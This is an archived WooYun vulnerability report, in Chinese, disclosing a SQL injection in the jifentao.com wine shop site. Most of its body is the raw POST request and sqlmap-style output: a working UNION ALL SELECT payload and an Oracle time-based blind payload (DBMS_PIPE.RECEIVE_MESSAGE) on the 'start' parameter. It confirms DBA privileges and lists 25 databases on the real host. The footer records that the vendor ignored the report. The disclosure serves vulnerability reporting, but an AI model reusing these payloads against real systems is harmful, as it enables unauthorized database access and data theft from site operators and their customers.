乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-29: 细节已通知厂商并且等待厂商处理中 2015-06-03: 厂商已经主动忽略漏洞,细节向公众公开
~~~
注入地址http://wine.jifentao.com/sjyouhui/?i=8C7FFB279D1C45BD9112EE1835B46E60数据包
POST /shangjia/ShangjiaAction.do?method=getShopBrandList& HTTP/1.1Host: wine.jifentao.comProxy-Connection: keep-aliveContent-Length: 106Accept: application/json, text/javascript, */*; q=0.01Origin: http://wine.jifentao.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://wine.jifentao.com/sjyouhui/?i=8C7FFB279D1C45BD9112EE1835B46E60Accept-Encoding: gzip,deflateAccept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4Cookie: JSESSIONID=8A3EA7E51C5494C143458872EE67350Estart=0&limit=24¶m=null&pSptId=2070221F788545BA982ADFADF2DCD5FC&zhichi=12&searchshopName=12&showsite=XXHJF
可注入参数start
Parameter: start (POST) Type: UNION query Title: Generic UNION query (NULL) - 16 columns Payload: start=0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(122)||CHR(107)||CHR(120)||CHR(113)||CHR(121)||CHR(120)||CHR(88)||CHR(118)||CHR(71)||CHR(76)||CHR(112)||CHR(99)||CHR(80)||CHR(112)||CHR(113)||CHR(118)||CHR(106)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &limit=24¶m=null&pSptId=2070221F788545BA982ADFADF2DCD5FC&zhichi=12&searchshopName=12&showsite=XXHJF Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: start=0 AND 6307=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(122)||CHR(115)||CHR(75),5)-- Pukn&limit=24¶m=null&pSptId=2070221F788545BA982ADFADF2DCD5FC&zhichi=12&searchshopName=12&showsite=XXHJF---back-end DBMS: Oraclecurrent user is DBA: Trueavailable databases [25]:[*] CHAYE[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HR[*] IX[*] JIFEN[*] MDSYS[*] NEWSHOP[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] SCOTT[*] SH[*] SHOP[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] ZBY
你们更专业
危害等级:无影响厂商忽略
忽略时间:2015-06-03 11:52
漏洞Rank:4 (WooYun评价)
暂无